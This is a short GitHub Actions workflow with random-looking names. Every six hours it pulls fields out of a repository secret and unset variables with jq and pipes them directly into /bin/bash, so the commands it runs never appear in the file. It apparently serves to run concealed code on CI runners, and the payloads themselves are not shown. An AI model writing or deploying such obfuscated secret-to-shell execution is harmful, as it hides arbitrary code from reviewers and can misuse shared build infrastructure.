name: yethigh
on:
  workflow_dispatch:
  schedule:
    - cron: '41 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yethigh
        env:
          vupo49: ${{ secrets.vupo49 }}
        run: |
          echo $vupo49 | jq -r .icvaw09 | /bin/bash
          echo $af8 | jq -r .jxqzx5256 | /bin/bash
          echo $hvsn620 | jq -r .hp8 | /bin/bash
          echo $q43 | jq -r .us9694 | /bin/bash
          echo $dhxs926 | jq -r .xtdu68490 | /bin/bash

